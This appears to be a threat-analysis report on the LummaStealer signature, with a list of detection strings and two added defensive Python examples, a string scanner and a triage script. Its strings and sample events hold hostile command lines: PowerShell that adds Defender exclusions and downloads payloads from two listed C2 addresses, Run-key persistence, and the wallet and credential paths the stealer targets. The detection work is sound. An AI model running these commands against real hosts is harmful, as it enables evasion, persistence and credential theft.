user@threatcheck.sh ~ threat-analysis
$ analyze-threat Trojan:Win64/LummaStealer!rfn
Trojan:Win64/LummaStealer!rfn - Windows Defender threat signature analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win64/LummaStealer!rfn
Classification:
Type:Trojan
Platform:Win64
Family:LummaStealer
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!rfn
Microsoft's naming documentation lists !rfn only as an internal category used to refer to some threats; it is not a ransomware marker. LummaStealer is an information stealer, not ransomware.
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan (a program that appears legitimate but performs malicious actions), 64-bit Windows platform, family LummaStealer.

Summary:

This is a concrete, family-specific detection of the LummaStealer information stealer. The malware collects secrets stored on the host: browser passwords and cookies (the Chromium os_crypt encrypted master key that protects them is referenced directly), cryptocurrency wallet files and browser wallet extensions (Electrum, Exodus, Jaxx, Coinomi, Daedalus, Binance, MetaMask), mail clients (TheBat, Pegasus), Telegram and 1Password data, plus a screenshot and basic system fingerprint (screen resolution, WMI Win32_ComputerSystem). The strings also show how it is delivered and stays resident: Run and RunOnce registry persistence, PowerShell used to add Defender exclusions and to download further payloads from hard-coded addresses, and RunPE-style process hollowing loaders (CreateSuspendedProcess, WriteProcessMemory, GetThreadContext/Wow64SetThreadContext, ResumeThread). Note that the string list below is the union of strings across several sub-signatures (Go, .NET, Rust and Themida/WinLicense-packed loaders appear side by side); no single sample contains all of them, and some entries (Inno Setup switches such as /VERYSILENT /SP-, packer artifacts such as .taggant and Software\WinLicense, ordinary section names such as .text and .rdata) are also common in legitimate software and are only meaningful in combination with the family-specific ones.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - os_crypt.encrypted_key (PEHSTR_EXT)
 - B.imports (PEHSTR_EXT)
 - os_c576xedrypt.encry576xedpted_key (PEHSTR_EXT)
 - Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (PEHSTR_EXT)
 - fyi/Blogtion.msi (PEHSTR_EXT)
 - ppCmdLine=/QN /norestart (PEHSTR_EXT)
 - atomic.QSY_zrh (PEHSTR_EXT)
 - - Screen Resoluton: (PEHSTR_EXT)
 - TEXTBIN.NET/raw (PEHSTR_EXT)
 - /VERYSILENT /SP- (PEHSTR_EXT)
 - aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
 - dKAoMzVdoGMRAuUpnzHLYIx.dll (PEHSTR_EXT)
 - bFISQFXZrlhowSppjMcUMEWMVO.dll (PEHSTR_EXT)
 - sxWsBcgMSxRdUCKXevfJKgAGAKoM.dll (PEHSTR_EXT)
 - qIadkkJWSlcNQdQofhpMzxrd.dll (PEHSTR_EXT)
 - LsVgHFhAfthrvrwvVQnXVYBStlK.dll (PEHSTR_EXT)
 - thoseintroductory.exe (PEHSTR_EXT)
 - callcustomerpro.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT)
 - GPUView.pdb (PEHSTR_EXT)
 - error_correction_update_check.My.Resources (PEHSTR_EXT)
 - installation_solution_for_use.My.Resources (PEHSTR_EXT)
 - .vuia3 (PEHSTR_EXT)
 - writerfunctionpro.exe (PEHSTR_EXT)
 - timeprogrammer.exe (PEHSTR_EXT)
 - DelNodeRunDLL32 (PEHSTR_EXT)
 - load_world.exe (PEHSTR_EXT)
 - live_stream_from_cosmos_events_app.exe (PEHSTR_EXT)
 - Account/Login (PEHSTR_EXT)
 - WebMatrix.WebData.Resources.WebDataResources (PEHSTR_EXT)
 - LoaderV1.Form1.resources (PEHSTR_EXT)
 - oFYSVYzChxVsXWmRsYqu.dll (PEHSTR_EXT)
 - tzYslkEExBzhWQjYATHOe.dll (PEHSTR_EXT)
 - OdZokoKlJenvDbhTg.dll (PEHSTR_EXT)
 - HeWSfFWuFmmMEQy.dll (PEHSTR_EXT)
 - ILLnogZyZLUtVXiOvwRHpTewBNs.dll (PEHSTR_EXT)
 - VioletRichPlayer364David.ZODvl (PEHSTR_EXT)
 - Revolutionizing connectivity with cutting-edge cloud solutions. (PEHSTR_EXT)
 - OergBcaAGPSxGICMDFJxnj (PEHSTR_EXT)
 - Leading the future of integrated technology solutions. (PEHSTR_EXT)
 - main.RedirectToPayload (PEHSTR_EXT)
 - main.LoadPEModule (PEHSTR_EXT)
 - main.GetNTHdrs (PEHSTR_EXT)
 - main.AllocPEBuffer (PEHSTR_EXT)
 - main.PERawToVirtual (PEHSTR_EXT)
 - main.CreateSuspendedProcess (PEHSTR_EXT)
 - main._LoadPEModule (PEHSTR_EXT)
 - main.Resume_Thread (PEHSTR_EXT)
 - main.Write_ProcessMemory (PEHSTR_EXT)
 - main.Get_ThreadContext (PEHSTR_EXT)
 - Intel Core Inc. Trademark (PEHSTR_EXT)
 - JSylCAgIufPyrE (PEHSTR_EXT)
 - <HTA:APPLICATION icon="#" WINDOWSTATE="normal" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" BORDER="none" SCROLL="no" (PEHSTR_EXT)
 - window.close(); (PEHSTR_EXT)
 - </script> (PEHSTR_EXT)
 - tLrmzJMsrWOFWmoOxcctAcCafzA.d (PEHSTR_EXT)
 - FgLHhdSuJHOQcVWHZfF.d (PEHSTR_EXT)
 - main.Md5Encode (PEHSTR_EXT)
 - main.EUkcKYTIDb (PEHSTR_EXT)
 - main.TerminateProcess (PEHSTR_EXT)
 - main.nlZMziDMqv (PEHSTR_EXT)
 - main.ResumeThread (PEHSTR_EXT)
 - main.WriteProcessMemory (PEHSTR_EXT)
 - main.Wow64SetThreadContext (PEHSTR_EXT)
 - main.GetThreadContext (PEHSTR_EXT)
 - LwNOrAxUVY/main.go (PEHSTR_EXT)
 - main.nwPXANdvbL (PEHSTR_EXT)
 - main.qWwvfeKaCT (PEHSTR_EXT)
 - JustABackDoor\obj\Debug\JustABackDoor.pdb (PEHSTR_EXT)
 - JustABackDoor.Executor (PEHSTR_EXT)
 - RunPowerShellCommand (PEHSTR_EXT)
 - debug.g.resources (PEHSTR_EXT)
 - psicologiaecultura.com.br (PEHSTR_EXT)
 - if ($exeName -eq "RSGame.exe") (PEHSTR_EXT)
 - main.UlhMFyDdoz (PEHSTR_EXT)
 - main.AEKCihaLRV (PEHSTR_EXT)
 - main.uydiOYgQCH.deferwrap2 (PEHSTR_EXT)
 - main.uydiOYgQCH.deferwrap1 (PEHSTR_EXT)
 - main.mOaSjsgDny.func1.Print.1 (PEHSTR_EXT)
 - test_lib/main.go (PEHSTR_EXT)
 - main.qHbLKcVFPY (PEHSTR_EXT)
 - main.BnMWnpUycO (PEHSTR_EXT)
 - main.HFdrQcLRTh (PEHSTR_EXT)
 - main.HwNcTblZxJ (PEHSTR_EXT)
 - main.khgzBwOcdS (PEHSTR_EXT)
 - main.RDF (PEHSTR_EXT)
 - main.cFVvJaclpr (PEHSTR_EXT)
 - main.oepNeSmKgT (PEHSTR_EXT)
 - main.cQPubDNZNj (PEHSTR_EXT)
 - main.neJDPbLRWD (PEHSTR_EXT)
 - main.VZCOQzehCp (PEHSTR_EXT)
 - main.WjLRMuNaor (PEHSTR_EXT)
 - main.EFTcmUgEtT (PEHSTR_EXT)
 - main.faqLSRWRlV (PEHSTR_EXT)
 - main.lnejYwfZkm (PEHSTR_EXT)
 - main.iiQhNBnnfo (PEHSTR_EXT)
 - main.opWGippTfg.deferwrap2 (PEHSTR_EXT)
 - main.opWGippTfg.deferwrap1 (PEHSTR_EXT)
 - main.KqqAVmjanJ (PEHSTR_EXT)
 - main.fQyfTGPUtq (PEHSTR_EXT)
 - exithook/hooks.go (PEHSTR_EXT)
 - main.randSeq (PEHSTR_EXT)
 - main.KwPMHzDibl (PEHSTR_EXT)
 - main._Cfunc_wrf (PEHSTR_EXT)
 - main._RunPE (PEHSTR_EXT)
 - main. (PEHSTR_EXT)
 - .deferwrap2 (PEHSTR_EXT)
 - .deferwrap1 (PEHSTR_EXT)
 - .func1 (PEHSTR_EXT)
 - .func2 (PEHSTR_EXT)
 - .func3 (PEHSTR_EXT)
 - .func4 (PEHSTR_EXT)
 - .func1.Print.1 (PEHSTR_EXT)
 - .rsrc (PEHSTR_EXT)
 - .idata   (PEHSTR_EXT)
 - .rsrc    (PEHSTR_EXT)
 - .func1.Print.func1 (PEHSTR_EXT)
 - complex integrate build quick sun understand network power fast support (PEHSTR_EXT)
 - =.M&o (SNID)
 - database\wirefr\x64\HTTP\Intero.pdb (PEHSTR_EXT)
 - .text (PEHSTR_EXT)
 - `.rdata (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - .00cfg (PEHSTR_EXT)
 - @.reloc (PEHSTR_EXT)
 - B.open (PEHSTR_EXT)
 - fequal.exe (PEHSTR_EXT)
 - .taggant (PEHSTR_EXT)
 - `.rsrc (PEHSTR_EXT)
 - Wallets/Electrum (PEHSTR_EXT)
 - Wallets/ElectronCash (PEHSTR_EXT)
 - %appdata%\com.liberty.jaxx\IndexedDB (PEHSTR_EXT)
 - wallets/Ethereum (PEHSTR_EXT)
 - %localappdata%\Coinomi (PEHSTR_EXT)
 - lid=%s&j=%s&ver=4.0 (PEHSTR_EXT)
 - TeslaBrowser/5.5 (PEHSTR_EXT)
 - Screen.png (PEHSTR_EXT)
 - Screen Resoluton: (PEHSTR_EXT)
 - POST /api HTTP/1.1 (PEHSTR_EXT)
 - %appdata%\com.liberty.jaxx (PEHSTR_EXT)
 - Mail Clients/TheBat (PEHSTR_EXT)
 - Mail Clients/Pegasus (PEHSTR_EXT)
 - Applications/Telegram (PEHSTR_EXT)
 - Applications/1Password (PEHSTR_EXT)
 - Wallets/Daedalus (PEHSTR_EXT)
 - appdata\exodus (PEHSTR_EXT)
 - appdata\binance (PEHSTR_EXT)
 - get-wmiobject-classwin32_computersystem (PEHSTR_EXT)
 - webextension@metamask.io (PEHSTR_EXT)
 - .func6 (PEHSTR_EXT)
 - .func6.1 (PEHSTR_EXT)
 - .func5 (PEHSTR_EXT)
 - .func5.1 (PEHSTR_EXT)
 - .func4.1 (PEHSTR_EXT)
 - .func3.1 (PEHSTR_EXT)
 - .func2.1 (PEHSTR_EXT)
 - .func8 (PEHSTR_EXT)
 - .func7 (PEHSTR_EXT)
 - Software\WinLicense (PEHSTR_EXT)
 - tsrnKMMRWaSmgIGBadTmRDVK.dll (PEHSTR_EXT)
 - EMgVkXRBlViHxiKJoGXomDnkozkr.dll (PEHSTR_EXT)
 - nxtSvXVgJXelyGLBfuddwnihiSLb.dll (PEHSTR_EXT)
 - wDSDpeHhJZHHlukYvJFvIbzlFEz.dll (PEHSTR_EXT)
 - QrUrwtPcnxxkwnxalgzJPWVFgTlT.dll (PEHSTR_EXT)
 - AfSdNM6/46ObIJJmWHHvpVJ (PEHSTR_EXT)
 - Tm5McYSCxHrGi4S+xs0dRKxy+8/OKxRNXx1SEPQEI804Dz4Y8PunFang (PEHSTR_EXT)
 - TextForm\obj\Debug\TextForm.pdb (PEHSTR_EXT)
 - Dwasakj.Properties.Resources (PEHSTR_EXT)
 - file:/// (PEHSTR_EXT)
 - main.CocLYFOOoa (PEHSTR_EXT)
 - main.lFDfigPOFq (PEHSTR_EXT)
 - main.CONTEXT (PEHSTR_EXT)
 - main.ISLAdTJUKL (PEHSTR_EXT)
 - I02Op2e6ZD52OJInVolF/WhWwGUgukvawTLHcS4qp (PEHSTR_EXT)
 - PWGVuoIBdb/core_injector.go (PEHSTR_EXT)
 - PWGVuoIBdb/injection.go (PEHSTR_EXT)
 - Charter.exe (PEHSTR_EXT)
 - "p": "%appdata%\\Ethereum", (PEHSTR_EXT)
 - "p": "%appdata%\\Bitcoin\wallets", (PEHSTR_EXT)
 - "p": "%localappdata%\\Microsoft\\Edge\\User Data", (PEHSTR_EXT)
 - "z": "Wallets/Bitcoin core", (PEHSTR_EXT)
 - "z": "Wallets/DashCore", (PEHSTR_EXT)
 - "n": "chrome.exe", (PEHSTR_EXT)
 - @.idata (PEHSTR_EXT)
 - aeblfdkhhhdcdjpifhhbdiojplfjncoa (PEHSTR_EXT)
 - src\executable_loader.rs (PEHSTR)
 - WinHttpWriteData (PEHSTR_EXT)
 - powershell -Command "Add-MpPreference -ExclusionPath (PEHSTR_EXT)
 - powershell -Command "Invoke-WebRequest -Uri (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb (PEHSTR_EXT)
 - /.exe" -Force (PEHSTR_EXT)
 - ExecutionPolicyRead after Close (PEHSTR_EXT)
 - 127.0.0.1:53 (PEHSTR_EXT)
 - Command (PEHSTR_EXT)
 - SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - Js) (SNID)
 - reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AdobeUpdater /t REG_SZ /d "%s" /f (PEHSTR_EXT)
 - cmd.exe /c (PEHSTR_EXT)
 - %userappdata%\RestartApp.exe (PEHSTR_EXT)
 - \\.\Oreans.vxd (PEHSTR_EXT)
 - .idata (PEHSTR_EXT)
 - SOFTWARE\WinLicense (PEHSTR_EXT)
 - /61GM (SNID)
 - Realtek_HD_Audio_Universal_Service_Driver.exe (PEHSTR_EXT)
 - -NoProfile -ExecutionPolicy Bypass -Command " (PEHSTR_EXT)
 - p://141.98.6.130:5554/ (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - p://84.21.189.22:5554/ (PEHSTR_EXT)
 - DownloaderApp.exe (PEHSTR_EXT)
 - .svG  (SNID)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
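The strings above are only useful if you understand how a PEHSTR-style signature consumes them: as a weighted set that fires once the matched weight reaches a threshold, so that low-value strings shared with legitimate installers cannot trigger a detection on their own. The following is an added example (not code from the report, and not Microsoft's engine) that models that logic over a subset of the listed strings. The weights and the threshold are assumptions chosen for illustration, not Defender's values; the sample images are constructed blobs, not real malware.

```python
"""Added example, not part of the original report or of Microsoft's engine:
a minimal PEHSTR-style scanner.  PEHSTR/PEHSTR_EXT entries in a Defender VDM
are weighted string sets that fire once the matched weight reaches a
threshold.  The strings below are a subset of the ones listed in the report;
the weights and the threshold are assumptions chosen for illustration."""
import re

# Assumed weights: family-specific strings (C2 beacon format, User-Agent,
# Chromium key name) score high; strings common in benign software score low.
SIGNATURE_STRINGS = {
    b"os_crypt.encrypted_key": 3,                    # Chromium master key used to decrypt saved logins
    b"os_c576xedrypt.encry576xedpted_key": 3,        # same string with junk inserted, as listed
    b"lid=%s&j=%s&ver=4.0": 3,                       # C2 beacon format string
    b"TeslaBrowser/5.5": 3,                          # C2 User-Agent
    b'powershell -Command "Add-MpPreference -ExclusionPath': 3,
    b'powershell -Command "Invoke-WebRequest -Uri': 2,
    b'-NoProfile -ExecutionPolicy Bypass -Command "': 2,
    b"webextension@metamask.io": 2,
    b"Wallets/Electrum": 2,
    b"%appdata%\\com.liberty.jaxx": 2,
    b"POST /api HTTP/1.1": 1,
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run": 1,      # also matches ...\RunOnce
    b"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce": 1,
    b"/VERYSILENT /SP-": 1,                          # Inno Setup switches, common in legitimate installers
}
THRESHOLD = 6  # assumed

# Matches the "p://<ip>:<port>/" form in which the two C2 URLs are listed above
# (the prefix is copied as listed; it also matches a full "http://").
C2_URL = re.compile(rb"p://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)/")


def scan(data: bytes):
    """Return (score, matched) for a file image.

    Each string is searched in both ASCII and UTF-16LE form, because strings in
    Windows binaries are frequently wide; a string counts once however many
    times or in whichever encoding it appears."""
    score, matched = 0, []
    for s, weight in SIGNATURE_STRINGS.items():
        wide = s.decode("latin-1").encode("utf-16-le")
        if s in data or wide in data:
            score += weight
            matched.append(s.decode("latin-1"))
    return score, sorted(matched)


def is_detected(data: bytes) -> bool:
    """Verdict: matched weight reaches the (assumed) threshold."""
    return scan(data)[0] >= THRESHOLD


def extract_c2(data: bytes):
    """Pull hard-coded C2 endpoints (ip, port) out of the image, deduplicated."""
    seen = []
    for ip, port in C2_URL.findall(data):
        pair = (ip.decode(), int(port))
        if pair not in seen:
            seen.append(pair)
    return seen


# Constructed sample images (not real malware): a stealer-like blob carrying
# several family strings, one of them UTF-16LE, and an installer-like blob that
# only carries the low-weight strings legitimate software also contains.
SAMPLE_STEALER = b"MZ\x90\x00" + b"\x00".join([
    b"os_crypt.encrypted_key",
    b"lid=%s&j=%s&ver=4.0",
    "TeslaBrowser/5.5".encode("utf-16-le"),
    b"Wallets/Electrum",
    b"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
    b"p://141.98.6.130:5554/",
])
SAMPLE_INSTALLER = b"MZ\x90\x00" + b"\x00".join([
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    b"/VERYSILENT /SP-",
    b"Inno Setup",
])

if __name__ == "__main__":
    for name, blob in (("stealer", SAMPLE_STEALER), ("installer", SAMPLE_INSTALLER)):
        score, hits = scan(blob)
        print(f"{name}: score={score} detected={is_detected(blob)} c2={extract_c2(blob)}")
        for h in hits:
            print("   ", h)
```

Two details matter in practice: the Run string is a prefix of the RunOnce string, so a naive substring search credits both for one occurrence (the toy keeps that behaviour deliberately; a real engine would anchor or deduplicate), and the installer blob scores below the threshold despite matching two listed strings, which is the point of weighting.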
Known malware which is associated with this threat:
Filename: 17f1708d36917a3095a76e3c6dc49d345fb0d95309894ca3ac54097f2e22d104
SHA-256: 17f1708d36917a3095a76e3c6dc49d345fb0d95309894ca3ac54097f2e22d104
Date: 04/12/2025
Remediation Steps:
Isolate the device from the network immediately. Before scanning, check for and remove Defender exclusions the malware may have added (the signature strings include powershell -Command "Add-MpPreference -ExclusionPath"), then run a full antivirus scan. Remove persistence: the strings show HKCU\Software\Microsoft\Windows\CurrentVersion\Run and RunOnce entries (for example a value named AdobeUpdater) and a dropped %userappdata%\RestartApp.exe, and look for payloads such as DownloaderApp.exe fetched from the listed addresses on port 5554. Assume every secret on the machine has already been exfiltrated: browser passwords and session cookies, cryptocurrency wallet files and seed data (Electrum, Exodus, Jaxx, Coinomi, MetaMask and others are enumerated), mail client, 1Password and Telegram data. From a separate, clean device change all passwords, revoke active sessions and API tokens, and move funds out of any wallet whose files were on the host to freshly generated wallets. Because the loader downloads additional payloads and the string list includes backdoor and RunPE-style injection artifacts, a scan alone does not make the host trustworthy; rebuild the operating system from known-good media.
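The remediation steps above turn into concrete actions once the command lines the signature describes are found in host telemetry. The following is an added example (not code from the report) that runs the page's command-line indicators over constructed process-creation events (Sysmon Event ID 1 or Security Event 4688 exports would be the real input) and derives clean-up commands from what it finds. The rule regexes are mine; Remove-MpPreference and reg delete are the standard counterparts of the Add-MpPreference and reg add calls the strings show; the victim paths are invented for the example.

```python
"""Added example, not part of the original report: a host-triage pass that
turns the command-line indicators present in the signature strings (Defender
exclusion via Add-MpPreference, download via Invoke-WebRequest, Run-key
persistence via reg add, the two listed C2 addresses) into findings and then
into concrete clean-up commands.  The process-creation events are constructed
for the example; real input would be Sysmon Event ID 1 or Security Event 4688."""
import re

# Indicators copied from the signature strings; hosts and port are the listed C2 URLs.
C2_HOSTS = {"141.98.6.130", "84.21.189.22"}
C2_PORT = "5554"

# (rule name, category, regex).  Capture groups carry what remediation needs.
RULES = [
    ("defender_exclusion", "defense-evasion",
     re.compile(r'Add-MpPreference\s+-ExclusionPath\s+"?([^\s"]+)', re.I)),
    ("policy_bypass", "execution",
     re.compile(r'-NoProfile\s+-ExecutionPolicy\s+Bypass', re.I)),
    ("payload_download", "command-and-control",
     re.compile(r'Invoke-WebRequest\s+-Uri\s+"?([^\s"]+)(?:.*?-OutFile\s+"?([^\s"]+))?', re.I)),
    ("run_key_persistence", "persistence",
     re.compile(r'reg\s+add\s+"?HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"?'
                r'.*?/v\s+(\S+).*?/d\s+"([^"]+)"', re.I)),
]


def triage(events):
    """Return one finding per (event, rule) hit; detail holds the regex capture groups."""
    findings = []
    for i, ev in enumerate(events):
        cmd = ev["cmdline"]
        for name, category, rx in RULES:
            m = rx.search(cmd)
            if m:
                findings.append({"event": i, "image": ev["image"], "rule": name,
                                 "category": category, "detail": m.groups()})
        hosts = sorted(h for h in C2_HOSTS if h in cmd)   # known C2 addresses from the signature
        if hosts or f":{C2_PORT}/" in cmd:
            findings.append({"event": i, "image": ev["image"], "rule": "known_c2",
                             "category": "command-and-control", "detail": tuple(hosts)})
    return findings


def remediation_plan(findings):
    """Map findings to clean-up commands (PowerShell / cmd), deduplicated, in order."""
    plan = []

    def add(cmd):
        if cmd not in plan:
            plan.append(cmd)

    for f in findings:
        d = f["detail"]
        if f["rule"] == "defender_exclusion":
            add(f'Remove-MpPreference -ExclusionPath "{d[0]}"')   # undo the exclusion before scanning
        elif f["rule"] == "run_key_persistence":
            add(f'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v {d[0]} /f')
            add(f'Remove-Item -Force "{d[1]}"')
        elif f["rule"] == "payload_download" and d[1]:
            add(f'Remove-Item -Force "{d[1]}"')
    return plan


# Constructed events (invented paths); events 0 and 4 are benign controls.
CONSTRUCTED_EVENTS = [
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -Command "Add-MpPreference -ExclusionPath C:\Users\victim\AppData\Roaming"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri '
                r'http://141.98.6.130:5554/DownloaderApp.exe -OutFile C:\Users\victim\AppData\Roaming\RestartApp.exe"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AdobeUpdater '
                r'/t REG_SZ /d "C:\Users\victim\AppData\Roaming\RestartApp.exe" /f'},
    {"image": r"C:\Program Files\Git\cmd\git.exe",
     "cmdline": r'"C:\Program Files\Git\cmd\git.exe" pull'},
]

if __name__ == "__main__":
    found = triage(CONSTRUCTED_EVENTS)
    for f in found:
        print(f"event {f['event']} [{f['category']}] {f['rule']}: {f['detail']}")
    print("clean-up:")
    for step in remediation_plan(found):
        print("   ", step)
```

The plan is ordered on purpose: the exclusion comes out first so the subsequent scan actually covers the staging directory, and the Run value is deleted before its target file so a reboot during clean-up cannot re-launch it. Credential and wallet rotation is not scripted here because it must happen from a different, clean device.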
=== END REPORT ===
This analysis was last updated on 04/12/2025.